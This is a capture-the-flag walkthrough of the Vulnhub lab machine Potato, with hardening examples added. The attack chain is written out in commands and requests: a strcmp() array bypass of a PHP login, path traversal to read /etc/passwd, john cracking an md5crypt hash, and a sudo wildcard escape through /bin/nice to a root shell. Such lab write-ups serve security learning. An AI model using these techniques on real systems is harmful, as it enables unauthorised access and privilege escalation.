[VULNHUB] Potato

Today we are going to hack the Vulnhub machine called Potato. You can download it from the following link: https://www.vulnhub.com/entry/potato-1,529/
  • Enumeration
  • We start with an nmap scan to see which ports are open.
    ~ > nmap -A -p- 192.168.1.136
    Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 11:09 CEST
    Nmap scan report for 192.168.1.136
    Host is up (0.00043s latency).
    Not shown: 65532 closed ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
    80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    |_http-title: Potato company
    2112/tcp open  ftp
    | fingerprint-strings:
    |   GenericLines:
    |     220 ProFTPD Server (Debian) [::ffff:192.168.1.136]
    |     Invalid command: try being more creative
    |_    Invalid command: try being more creative
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port2112-TCP:V=7.70%I=7%D=9/10%Time=5F59ED59%P=x86_64-pc-linux-gnu%r(Ge
    SF:nericLines,90,"220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:192\.
    SF:168\.1\.136\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20
    SF:creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creat
    SF:ive\r\n");
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 66.77 seconds
    We see it exposes HTTP, SSH and an FTP server on port 2112. We connect to the FTP server with anonymous/anonymous to see what is there.
    ~ > ftp 192.168.1.136 2112
    Connected to 192.168.1.136.
    220 ProFTPD Server (Debian) [::ffff:192.168.1.136]
    Name (192.168.1.136:sml): anonymous
    331 Anonymous login ok, send your complete email address as your password
    Password:
    230-Welcome, archive user anonymous@192.168.1.59 !
    230-
    230-The local time is: Thu Sep 10 11:12:03 2020
    230-
    230 Anonymous access granted, restrictions apply
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls -la
    200 PORT command successful
    150 Opening ASCII mode data connection for file list
    drwxr-xr-x   2 ftp      ftp          4096 Aug  2 19:33 .
    drwxr-xr-x   2 ftp      ftp          4096 Aug  2 19:33 ..
    -rw-r--r--   1 ftp      ftp           901 Aug  2 19:33 index.php.bak
    -rw-r--r--   1 ftp      ftp            54 Aug  2 18:17 welcome.msg
    226 Transfer complete
    ftp>
    We download the file index.php.bak (and welcome.msg while we are at it).
    ftp> get index.php.bak
    local: index.php.bak remote: index.php.bak
    200 PORT command successful
    150 Opening BINARY mode data connection for index.php.bak (901 bytes)
    226 Transfer complete
    901 bytes received in 0.00 secs (928.1464 kB/s)
    ftp> get welcome.msg
    local: welcome.msg remote: welcome.msg
    200 PORT command successful
    150 Opening BINARY mode data connection for welcome.msg (54 bytes)
    226 Transfer complete
    54 bytes received in 0.00 secs (1.1704 MB/s)
    ftp>
    Let's take a look at it.
    ~ > cat index.php.bak
    ---SNIP---
    if (strcmp($_POST['username'], "admin") == 0 && strcmp($_POST['password'], $pass) == 0) {
    ---SNIP---
    We see that the PHP code compares the credentials with strcmp() and a loose == check, which can be bypassed[1]. Knowing this, we run gobuster to see if we can find any interesting directory on the website.
    ~ > gobuster dir -u http://192.168.1.136/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.1.136/
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/09/10 11:10:43 Starting gobuster
    ===============================================================
    /.hta (Status: 403)
    /.htpasswd (Status: 403)
    /admin (Status: 301)
    /.htaccess (Status: 403)
    /index.php (Status: 200)
    /server-status (Status: 403)
    ===============================================================
    2020/09/10 11:10:46 Finished
    ===============================================================
    We find the /admin directory :) Visiting http://192.168.1.136/admin shows a page where we have to enter a username and password. Since we have already seen the code and know the vulnerability, we start Burp, enter "admin" as the username and anything at all as the password... Once the request is captured, we change it to:
    username=admin&password[]=%22%22
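    Why that request works, and how the check should have been written, as an added example (not the VM's own index.php, which only survives as the snippet above): the original strcmp() check beside a hardened version, run against a constructed $_POST. The value of $pass and the request arrays are assumptions, and the bypass relies on PHP 7's behaviour.

```php
<?php
// Added example (not from the Potato VM's index.php): the strcmp() check
// from index.php.bak beside a hardened version, run against a constructed
// $_POST. $pass stands in for the real password the backup file defines.
$pass = 'constructed-secret';

// Vulnerable: strcmp() with a non-string operand returns NULL in PHP 7
// (PHP 8 throws a TypeError instead), and NULL == 0 is true under loose
// comparison, so password[]=anything satisfies the second condition.
function login_vulnerable(array $post, string $pass): bool {
    return strcmp($post['username'], "admin") == 0
        && strcmp($post['password'], $pass) == 0;
}

// Hardened: reject non-string input before comparing, then use
// hash_equals() for a strict, constant-time match.
function login_hardened(array $post, string $pass): bool {
    $user = $post['username'] ?? null;
    $pw   = $post['password'] ?? null;
    if (!is_string($user) || !is_string($pw)) {
        return false;            // arrays, nulls, ints: never a valid credential
    }
    return hash_equals('admin', $user) && hash_equals($pass, $pw);
}

// Constructed requests: a real login, and the array bypass from the write-up.
$legit  = ['username' => 'admin', 'password' => 'constructed-secret'];
$bypass = ['username' => 'admin', 'password' => ['""']];

var_dump(login_vulnerable($legit, $pass));   // true
var_dump(@login_vulnerable($bypass, $pass)); // true on PHP 7: the bypass works
var_dump(login_hardened($legit, $pass));     // true
var_dump(login_hardened($bypass, $pass));    // false: array input rejected
```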
    It worked :) Now we click on "dashboard". Inside Dashboard there are several "options", but if we look at "Log" we see we can choose between 3 files. We pick any of them and capture the request with Burp. We modify the "file=" parameter so that it shows us /etc/passwd, leaving the request as follows:
    POST /admin/dashboard.php?page=log HTTP/1.1
    Host: 192.168.1.136
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.1.136/admin/dashboard.php?page=log
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 30
    DNT: 1
    Connection: close
    Cookie: pass=serdesfsefhijosefjtfgyuhjiosefdfthgyjh
    Upgrade-Insecure-Requests: 1

    file=../../../../../etc/passwd
    It returns:
    Contenu du fichier ../../../../../etc/passwd :
    ---SNIP---
    webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin
    ---SNIP---
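    A hardened log viewer, as an added example (not the VM's dashboard.php): the file= value is checked against an allow-list of the three log names the page offers and then confined to the log directory, so the traversal above is refused. The directory path and the log names are assumptions.

```php
<?php
// Added example (not the VM's dashboard.php): hardened handling of the
// file= parameter of the "Log" page. LOG_DIR and the log names are assumed.
const LOG_DIR = '/var/www/html/admin/logs';   // assumed location

// Returns the log contents, or null when the request is refused.
function read_log(string $requested): ?string {
    // 1. Allow-list: only the three names the dashboard offers are valid.
    $allowed = ['log_access', 'log_error', 'log_auth'];   // assumed names
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    // 2. Defence in depth: resolve the path and confirm it is still inside
    //    LOG_DIR, so '..' segments and symlinks cannot escape it.
    $base = realpath(LOG_DIR);
    $path = realpath(LOG_DIR . '/' . $requested);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return file_get_contents($path);
}

// Constructed inputs: a legitimate choice and the traversal from the write-up.
var_dump(read_log('log_access') !== null);          // true if the file exists
var_dump(read_log('../../../../../etc/passwd'));    // NULL: refused
```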
    We see there is a user called webadmin, and his password hash is stored directly in /etc/passwd (rather than in /etc/shadow), so anyone who can read that file gets it. We use john to crack the password!
    ~/Descargas/john-1.9.0-jumbo-1/run > ./john --wordlist=/usr/share/wordlists/rockyou.txt ~/tocrack.txt
    Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
    Use the "--format=md5crypt-long" option to force loading these as that type instead
    Using default input encoding: UTF-8
    Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
    Will run 2 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    dragon           (webadmin)
    1g 0:00:00:00 DONE (2020-09-10 12:31) 100.0g/s 19200p/s 19200c/s 19200C/s 123456..november
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed
    We see that john recovers the password. We log in over SSH with the credentials obtained (webadmin/dragon).
  • Low Shell
  • ~ > ssh webadmin@192.168.1.136
    webadmin@192.168.1.136's password:
    Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)

     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage

      System information as of Thu 10 Sep 2020 12:31:36 PM UTC

      System load:             0.08
      Usage of /:              12.6% of 31.37GB
      Memory usage:            36%
      Swap usage:              0%
      Processes:               114
      Users logged in:         0
      IPv4 address for enp0s3: 192.168.1.136
      IPv6 address for enp0s3: 2a01:c50e:21e3:0:a00:27ff:fe89:8d97

    Last login: Sun Aug  2 19:56:20 2020 from 192.168.1.11
    webadmin@serv:~$
  • user.txt
  • webadmin@serv:~$ ls -la
    total 32
    drwxr-xr-x 3 webadmin webadmin 4096 Aug  2 19:26 .
    drwxr-xr-x 4 root     root     4096 Aug  2 18:18 ..
    -rw------- 1 webadmin webadmin  357 Aug  2 19:10 .bash_history
    -rw-r--r-- 1 webadmin webadmin  220 Aug  2 18:18 .bash_logout
    -rw-r--r-- 1 webadmin webadmin 3771 Aug  2 18:18 .bashrc
    drwx------ 2 webadmin webadmin 4096 Aug  2 18:34 .cache
    -rw-r--r-- 1 webadmin webadmin  807 Aug  2 18:18 .profile
    -rw------- 1 webadmin root       69 Aug  2 19:26 user.txt
    webadmin@serv:~$ cat user.txt
    TGUgY29udHLDtGxlIGVzdCDDoCBwZXUgcHLDqHMgYXVzc2kgcsOpZWwgcXXigJl1bmUg
  • Privilege Escalation
  • We check whether we can do anything with sudo.
    webadmin@serv:/home/florianges$ sudo -l
    [sudo] password for webadmin:
    Sorry, try again.
    [sudo] password for webadmin:
    Matching Defaults entries for webadmin on serv:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User webadmin may run the following commands on serv:
        (ALL : ALL) /bin/nice /notes/*
    We see we can run nice on anything under /notes/*. We'll take advantage of that * :) Since /notes/* is matched as an argument to /bin/nice, sudo's wildcard also matches the slashes inside a path, so an argument that starts with /notes/ and then climbs out with .. still satisfies the rule.
    webadmin@serv:~$ echo "/bin/bash" > shell.sh
    webadmin@serv:~$ chmod 777 shell.sh
    webadmin@serv:~$ sudo /bin/nice /notes/../home/webadmin/shell.sh
    root@serv:/home/webadmin# id
    uid=0(root) gid=0(root) groups=0(root)
  • root.txt
  • root@serv:/home/webadmin# cd /root
    root@serv:~# ls
    root.txt  snap
    root@serv:~# cat root.txt
    bGljb3JuZSB1bmlqYW1iaXN0ZSBxdWkgZnVpdCBhdSBib3V0IGTigJl1biBkb3VibGUgYXJjLWVuLWNp
    ZWwuIA==
  • End
  • And with that we are root on the machine.

    [1] https://www.doyler.net/security-not-included/bypassing-php-strcmp-abctf2016